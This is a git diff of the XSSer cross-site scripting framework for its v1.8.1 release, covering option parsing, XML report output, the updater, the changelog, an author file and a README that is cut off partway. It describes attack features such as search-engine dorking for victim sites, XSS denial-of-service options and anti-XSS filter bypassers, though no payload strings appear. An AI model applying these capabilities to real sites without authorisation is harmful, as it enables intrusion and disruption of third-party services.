+        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR  - Use <iframe> source tag")
+        group10.add_option("--Dos", action="store_true", dest="dos", help="DOS  - XSS (client) Denial of Service")
+        group10.add_option("--Doss", action="store_true", dest="doss", help="DOSs - XSS (server) Denial of Service")
         self.add_option_group(group10)
 
         group11 = optparse.OptionGroup(self, "*Reporting*")
-        group11.add_option("--save", action="store_true", dest="fileoutput", help="export to file (XSSreport.raw)")
-        group11.add_option("--xml", action="store", dest="filexml", help="export to XML (--xml file.xml)")
+        group11.add_option("--save", action="store_true", dest="fileoutput", help="Export to file (XSSreport.raw)")
+        group11.add_option("--xml", action="store", dest="filexml", help="Export to XML (--xml file.xml)")
         self.add_option_group(group11)
 
         group12 = optparse.OptionGroup(self, "*Miscellaneous*")
-        group12.add_option("--silent", action="store_true", dest="silent", help="inhibit console output results")
-        group12.add_option("--no-head", action="store_true", dest="nohead", help="NOT send a HEAD request before start a test")
-        group12.add_option("--alive", action="store", dest="isalive", type="int", help="set limit of errors before check if target is alive")
-        group12.add_option("--update", action="store_true", dest="update", help="check for latest stable version")
+        group12.add_option("--silent", action="store_true", dest="silent", help="Inhibit console output results")
+        group12.add_option("--alive", action="store", dest="isalive", type="int", help="Set limit of errors before check if target is alive")
+        group12.add_option("--update", action="store_true", dest="update", help="Check for latest stable version")
         self.add_option_group(group12)
 
     def get_options(self, user_args=None):
         (options, args) = self.parse_args(user_args)
-        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target):
+        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target and not options.checktor):
             print "\n", '='*75
             print self.version
             print "-----------", "\n"
             print self.description, "\n"
             print '='*75
             print ""
-            print "                                       \\ \\                           %"
-            print "Project site:","                          \\ \\     LulZzzz!           %  "
-            print "http://xsser.03c8.net                 %% \\_\\                      %   "
-            print "                                      \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)         Bbzzzzz!      %  "
-            print "                                       \== < ==                  %      "
-            print "Forum:                                    / \_      ==       %          "
-            print "irc.freenode.net -> #xsser              (')   \   *=====%             "
-            print "                                       /  /       ========              "
+            print "                                \\ \\   LulZzzz!    /\                          "
+            print "Project site:","                && \\ \\            /\())\          %  %        "
+            print "https://xsser.03c8.net       &&&& \\_\\          (())\\))  %   %        %       " 
+            print "                              \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)      * //\\//\\%                 %  %"
+            print "                              || == < ==   * * \\//))//)  BBzzzzz!              "
+            print "Forum:                        ||]~~/ \~~[ *    (())//))                         "
+            print "irc.freenode.net -> #xsser    ||   (')          \/())/                          "
+            print "                              ||  /  /            \/                            "
             print ""
             print '='*75
             print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)
diff --git a/xsser/core/post/__init__.py b/core/post/__init__.py
similarity index 84%
rename from xsser/core/post/__init__.py
rename to core/post/__init__.py
index 192a90c..22a1b8e 100644
--- a/xsser/core/post/__init__.py
+++ b/core/post/__init__.py
@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/post/xml_exporter.py b/core/post/xml_exporter.py
similarity index 61%
rename from xsser/core/post/xml_exporter.py
rename to core/post/xml_exporter.py
index 0df077e..5ea20b3 100644
--- a/xsser/core/post/xml_exporter.py
+++ b/core/post/xml_exporter.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -31,8 +29,7 @@ class xml_reporting(object):
     def __init__(self, xsser):
         # initialize main XSSer
         self.instance = xsser
-
-	# some counters
+	    # some counters
         self.xsr_found = 0
         self.xsa_found = 0
         self.coo_found = 0
@@ -47,7 +44,6 @@ def print_xml_results(self, filename):
         title.text = "XSSer Security Report: " + str(datetime.datetime.now())
         abstract = ET.SubElement(root, "abstract")
         total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
             pass 
         injections = ET.SubElement(abstract, "injections")
@@ -55,9 +51,7 @@ def print_xml_results(self, filename):
         failed_inj = ET.SubElement(injections, "failed")
         success_inj = ET.SubElement(injections, "successful")
         accur_inj = ET.SubElement(injections, "accur")
-
         total_inj_i = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         total_inj.text = str(total_inj_i)
         failed_inj.text = str(len(self.instance.hash_notfound))
         success_inj.text = str(len(self.instance.hash_found))
@@ -65,7 +59,6 @@ def print_xml_results(self, filename):
             accur_inj.text = "%s %%" % (str((len(self.instance.hash_found) * 100) / total_inj_i), )
         except ZeroDivisionError:
             accur_inj.text = "0 %"
-
         if self.instance.options.statistics:
             stats = ET.SubElement(root, "stats")
             test_time = datetime.datetime.now() - self.instance.time
@@ -103,7 +96,7 @@ def print_xml_results(self, filename):
         results = ET.SubElement(root, "results")
         for line in self.instance.hash_found:
             attack = ET.SubElement(results, "attack")
-            url_ = ET.SubElement(attack, "injection")
+            url_ = ET.SubElement(attack, "payload")
             url_.text = line[0]
             attack_url = self.instance.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
             if self.instance.options.onm or self.instance.options.ifr or self.instance.options.b64  or self.instance.options.dos or self.instance.options.doss or self.instance.options.finalremote or self.instance.options.finalpayload:
@@ -116,42 +109,42 @@ def print_xml_results(self, filename):
                 if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Referer Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSR Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "xsa":
                 self.xsa_found = self.xsa_found +1
                 xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Agent Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSA Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "coo":
                 self.coo_found = self.coo_found +1
                 coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Cookie Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "Cookie Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dcp":
                 self.dcp_found = self.dcp_found +1
                 dcp_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dcp_vulnerable_host[0]["payload"] == line[4] and dcp_vulnerable_host[0]["target"] == line[6] and self.dcp_found > 1:
                     pass
                 else:
-                    aurl.text = "Data Control Protocol injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DCP (Data Control Protocol) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dom":
                 self.dom_found = self.dom_found +1
                 dom_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dom_vulnerable_host[0]["payload"] == line[4] and dom_vulnerable_host[0]["target"] == line[6] and self.dom_found > 1:
                     pass
                 else:
-                    aurl.text = "Document Object Model injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DOM (Document Object Model) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "ind":
                 self.ind_found = self.ind_found +1
                 ind_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if ind_vulnerable_host[0]["payload"] == line[4] and ind_vulnerable_host[0]["target"] == line[6] and self.ind_found > 1:
                     pass
                 else:
-                    aurl.text = "HTTP Response Splitting Induced code!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "HTTPrs (HTTP Response Splitting) " + str(line[6]) + "/"+str(line[4])
             else:
                 if aurl == None:
                     pass
@@ -160,14 +153,43 @@ def print_xml_results(self, filename):
             if line[2] == "xsr" or line[2] == "xsa" or line[2] == "coo" or line[2] == "dcp" or line[2] == "dom" or line[2] == "ind":
                 pass
             else:
-                browsers = ET.SubElement(attack, "browsers")
+                browsers = ET.SubElement(attack, "vulnerable")
                 browsers.text = line[1]
-                method = ET.SubElement(attack, "method")
+                method = ET.SubElement(attack, "vector")
                 method.text = line[2]
-
         if not self.instance.hash_found:
-            msg = ET.SubElement(results, "message")
-            msg.text = "Failed injection(s): " +str(''.join([u[0] for u in self.instance.hash_notfound])) 
+            msg = ET.SubElement(results, "results")
+            msg.text = ""
+            for h in self.instance.hash_notfound:
+                if h[2] == 'heuristic':
+                    if not h[4]:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                elif h[2] == 'hashing check':
+                    if not h[4]:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                else:
+                    if h[4]:
+                        if h[2] == "XSA":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                    else:
+                        if h[2] == "XSA": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                msg.text = msg.text + "="*75 + "\n\n"
         tree = ET.ElementTree(root)
         tree.write(filename)
-
diff --git a/xsser/core/randomip.py b/core/randomip.py
similarity index 91%
rename from xsser/core/randomip.py
rename to core/randomip.py
index 8d29528..08a3157 100644
--- a/xsser/core/randomip.py
+++ b/core/randomip.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/reporter.py b/core/reporter.py
similarity index 92%
rename from xsser/core/reporter.py
rename to core/reporter.py
index 1741ffd..db28dba 100644
--- a/xsser/core/reporter.py
+++ b/core/reporter.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/threadpool.py b/core/threadpool.py
similarity index 96%
rename from xsser/core/threadpool.py
rename to core/threadpool.py
index cf6d8c7..ffa0920 100644
--- a/xsser/core/threadpool.py
+++ b/core/threadpool.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -121,19 +119,31 @@ def makeRequests(callable_, args_list, callback=None,
     """
     requests = []
     for item in args_list:
+        is_crawling = False
+        try:
+            psy = item[3] # black magic!
+            is_crawling = True
+        except:
+            is_crawling = False
+
         if isinstance(item, tuple):
             requests.append(
                 WorkRequest(callable_, item[0], item[1], callback=callback,
                     exc_callback=exc_callback)
             )
         else:
-            requests.append(
-                WorkRequest(callable_, item, None, callback=callback,
-                    exc_callback=exc_callback)
-            )
+            if is_crawling == True:
+                requests.append(
+                    WorkRequest(callable_, [item], None, callback=callback,
+                        exc_callback=exc_callback)
+                )
+            else:
+                requests.append(
+                    WorkRequest(callable_, item, None, callback=callback,
+                        exc_callback=exc_callback)
+                )
     return requests
 
-
 # classes
 class WorkerThread(threading.Thread):
     """Background thread connected to the requests/results queues.
diff --git a/xsser/core/tokenhub.py b/core/tokenhub.py
similarity index 96%
rename from xsser/core/tokenhub.py
rename to core/tokenhub.py
index 9d7c9a5..f045d93 100644
--- a/xsser/core/tokenhub.py
+++ b/core/tokenhub.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/twsupport.py b/core/twsupport.py
similarity index 98%
rename from xsser/core/twsupport.py
rename to core/twsupport.py
index 7301684..a2c1e1c 100644
--- a/xsser/core/twsupport.py
+++ b/core/twsupport.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/update.py b/core/update.py
similarity index 74%
rename from xsser/core/update.py
rename to core/update.py
index 875899d..59bfc06 100644
--- a/xsser/core/update.py
+++ b/core/update.py
@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -28,17 +28,20 @@ class Updater(object):
     Update XSSer automatically from a .git repository
     """     
     def __init__(self):
-        GIT_REPOSITORY = "https://github.com/epsylon/xsser"
-        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '../../', ''))
+        GIT_REPOSITORY = "https://code.03c8.net/epsylon/xsser"
+        GIT_REPOSITORY2 = "https://github.com/epsylon/xsser"
+        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
         if not os.path.exists(os.path.join(rootDir, ".git")):
-            print "Not any .git repository found!\n"
+            print "[Error] Not any .git repository found!\n"
             print "="*30
             print "\nTo have working this feature, you should clone XSSer with:\n"
-            print "$ git clone %s" % GIT_REPOSITORY, "\n"
+            print "$ git clone %s" % GIT_REPOSITORY
+            print "\nAlso you can try this other mirror:\n"
+            print "$ git clone %s" % GIT_REPOSITORY2 + "\n"
         else:
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             print checkout
             if not "Already up-to-date" in checkout:
-                print "Congratulations!! XSSer has been updated... ;-)"
+                print "Congratulations!! XSSer has been updated... ;-)\n"
             else:
-                print "Your XSSer doesn't need to be updated... ;-)"
+                print "Your XSSer doesn't need to be updated... ;-)\n"
diff --git a/doc/AUTHOR b/doc/AUTHOR
new file mode 100644
index 0000000..42f06e0
--- /dev/null
+++ b/doc/AUTHOR
@@ -0,0 +1,41 @@
+========================
+
+ nick: psy (epsylon)
+  
+  <epsylon@riseup.net> 
+
+ web: https://03c8.net
+
+=======================
+
+ code:
+
+  https://code.03c8.net/epsylon
+
+=======================
+
+ software/projects:
+
+ - AnonTwi: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
+ - Bordercheck: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
+ - CIntruder: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
+ - Collatz: Tool to simulate the Collatz's conjeture.
+ - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
+ - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
+ - Goldbach: Tool to simulate the Goldbach's conjeture.
+ - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network.
+ - Orb: Tool for massive footprinting.
+ - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
+ - Propagare: Tool for extraction, organization and semantic analysis of newspapers.
+ - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
+ - PyDog4Apache: Tool to sneak logs from Apache web server.
+ - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
+ - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+=======================
+
+ BTC: 
+
+  19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
+
+========================
diff --git a/xsser/doc/CHANGELOG b/doc/CHANGELOG
similarity index 74%
rename from xsser/doc/CHANGELOG
rename to doc/CHANGELOG
index f172ff7..cf71392 100644
--- a/xsser/doc/CHANGELOG
+++ b/doc/CHANGELOG
@@ -1,7 +1,26 @@
 ================================================================
-Changelog: XSSer v1.7.2 (xsser.03c8.net)
+Changelog: XSSer v1.8.1 (https://xsser.03c8.net)
 ==============================
 
+=================
+September 20, 2019:
+=================
+
+- Re-factorized: Main(), Hashers, Payloaders, Reporters, Exporters...
+- Removed: deprecated features
+- Removed: --no-head (from default)
+- Added: new options: --check-tor, --auto-set, --auto-info and --auto-random
+- Added: new search engines: duck, startpage
+- Added: new dorks (Total: 40)
+- Added: Anti-antiXSS Firewall rules (Bypassers provided for: Firefox, IE, Opera, Chrome)
+- Modified/Updated: DCP (Data Control Protocol) method
+- Modified/Updated: HTTPrs (HTTP Response Splitting) injections
+- Modified/Updated: GTK+
+- Modified/Updated: Crawler/Spidering
+- Updated: "Extra Attacks" (XSA, XSR, COOKIE)
+- Updated: Automatic XSS vectors list (Total: 1326 = XSS: 1293 + DCP: 16 + DOM: 6 + HTTPsr: 11)
+- Updated: XSSer tool updater
+- Updated: Documentation
 
 =================
 April 12, 2018:
@@ -107,8 +126,8 @@ September 22, 2010:
 - New dorker engines (total 10) 
 - Core clean 
 - Bugfixing 
-- Social Networking auto-publisher -
-- Started -federated- XSS (full disclosure) pentesting botnet.
+- Social Networking auto-publisher
+- Started -federated- XSS (full disclosure) pentesting botnet
 
     http://identi.ca/xsserbot01
     http://twitter.com/xsserbot01
@@ -125,7 +144,7 @@ August 20, 2010:
 - Post-processing payloading 
 - DOM Shadows! 
 - Cookie injector 
-- Browser DoS (Denegation of Service).
+- Browser DoS (Denegation of Service)
 
 =================
 July 1, 2010:
@@ -133,29 +152,29 @@ July 1, 2010:
 
 - Dorking 
 - Crawling 
-- IP DWORD + Core clean.
+- IP DWORD + Core clean
 
 =================
 April 19, 2010:
 =================
 
-- HTTPS implemented + patched bugs.
+- HTTPS implemented + patched bugs
 
 =================
 March 22, 2010:
 =================
 
-- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer.
+- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer
 
 =================
 March 18, 2010:
 =================
 
-- Added attack payloads to fuzzer (62 different XSS injections).
+- Added attack payloads to fuzzer (62 different XSS injections)
 
 =================
 March 16, 2010:
 =================
 
-- Added new payload encoders to bypass filters.
+- Added new payload encoders to bypass filters
 
diff --git a/xsser/doc/COPYING b/doc/COPYING
similarity index 100%
rename from xsser/doc/COPYING
rename to doc/COPYING
diff --git a/xsser/doc/INSTALL b/doc/INSTALL
similarity index 67%
rename from xsser/doc/INSTALL
rename to doc/INSTALL
index a45e902..c41891a 100644
--- a/xsser/doc/INSTALL
+++ b/doc/INSTALL
@@ -1,11 +1,23 @@
 ============================================
-XSSer - Cross Site Scripter - 2011/2018
+Introduction:
 ============================================
 
 Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
 
-===================
-How-to INSTALL:
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
++ INSTALL: AUTO
+==================
+
+  sudo python setup.py install
+
+================================================================
++ INSTALL: MANUAL
 ===================
 
 XSSer runs on many platforms. It requires Python and the following libraries:
@@ -30,19 +42,5 @@ On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... als
        * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
        * PyGeoIP: https://pypi.python.org/pypi/GeoIP
 
-=========
-
-Please report any problems you encounter using/installing XSSer to the xsser-users mailing-list:
-
-    - xsser-users@lists.sourceforge.net
-
-Or write directly to:
-
-    - epsylon@riseup.net
-
-Website: 
-
-    - https://xsser.03c8.net
-
-=========
+================================================================
 
diff --git a/xsser/doc/MANIFESTO b/doc/MANIFESTO
similarity index 94%
rename from xsser/doc/MANIFESTO
rename to doc/MANIFESTO
index 7417753..0a635d2 100644
--- a/xsser/doc/MANIFESTO
+++ b/doc/MANIFESTO
@@ -6,6 +6,6 @@ The Mosquito or Mosquito alarm (marketed as the Beethoven in France and the Swis
 
 The device is marketed as a safety and security tool for preventing youths from congregating in specific areas. As such, it is promoted to reduce anti-social behaviour such as loitering, graffiti, vandalism, drug use, drug distribution, and violence. In the UK, over 3,000 have been sold, mainly for use outside shops and near transport hubs. The device is also sold in Australia, France, Denmark, Italy, Germany, Switzerland, Canada and the USA. 
 
+====================================
 The code doesn't obey the system!
-
-BBZzzzzzzzZZZZZZZZzzzz....
+====================================
diff --git a/doc/README b/doc/README
new file mode 100644
index 0000000..c2d366a
--- /dev/null
+++ b/doc/README
@@ -0,0 +1,350 @@
+================================================================
+Introduction:
+==============================
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
+
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
+Options and features:
+==============================
+ 
+Usage: 
+
+xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
+[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and
+report XSS vulnerabilities in web-based applications.
+
+Options:
+  --version             show program's version number and exit
+  -h, --help            show this help message and exit
+  -s, --statistics      show advanced statistics output results
+  -v, --verbose         active verbose mode output results
+  --gtk                 launch XSSer GTK Interface
+  --wizard              start Wizard Helper!
+
+  *Special Features*:
+    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
+    code embedded. XST allows you to discover if target is vulnerable to
+    'Cross Site Tracing' [CAPEC-107]:
+
+    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
+    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
+    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
+
+  *Select Target(s)*:
+    At least one of these options must to be specified to set the source
+    to get target(s) urls from:
+
+    --all=TARGET        Automatically audit an entire target
+    -u URL, --url=URL   Enter target to audit
+    -i READFILE         Read target(s) urls from file
+    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
+    -l                  Search from a list of 'dorks'
+    --De=DORK_ENGINE    Use this search engine (default: yahoo)
+    --Da                Search massively using all search engines
+
+  *Select type of HTTP/HTTPS Connection(s)*:
+    These options can be used to specify which parameter(s) we want to use
+    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
+    inject:
+
+    -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
+    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
+    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
+    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
+    --Cl                Crawl only local target(s) urls (default: FALSE)
+
+  *Configure Request(s)*:
+    These options can be used to specify how to connect to the target(s)
+    payload(s). You can choose multiple:
+
+    --head              Send a HEAD request before start a test
+    --cookie=COOKIE     Change your HTTP Cookie header
+    --drop-cookie       Ignore Set-Cookie header from response
+    --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
+    --referer=REFERER   Use another HTTP Referer header (default: NONE)
+    --xforw             Set your HTTP X-Forwarded-For with random IP values
+    --xclient           Set your HTTP X-Client-IP with random IP values
+    --headers=HEADERS   Extra HTTP headers newline separated
+    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
+    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
+    --check-tor         Check to see if Tor is used properly
+    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
+    --ignore-proxy      Ignore system default HTTP proxy
+    --timeout=TIMEOUT   Select your timeout (default: 30)
+    --retries=RETRIES   Retries when connection timeout (default: 1)
+    --threads=THREADS   Maximum number of concurrent requests (default: 5)
+    --delay=DELAY       Delay in seconds between each request (default: 0)
+    --tcp-nodelay       Use the TCP_NODELAY option
+    --follow-redirects  Follow server redirection responses (302)
+    --follow-limit=FLI  Set limit for redirection requests (default: 50)
+
+  *Checker Systems*:
+    These options are useful to know if your target is using filters
+    against XSS attacks:
+
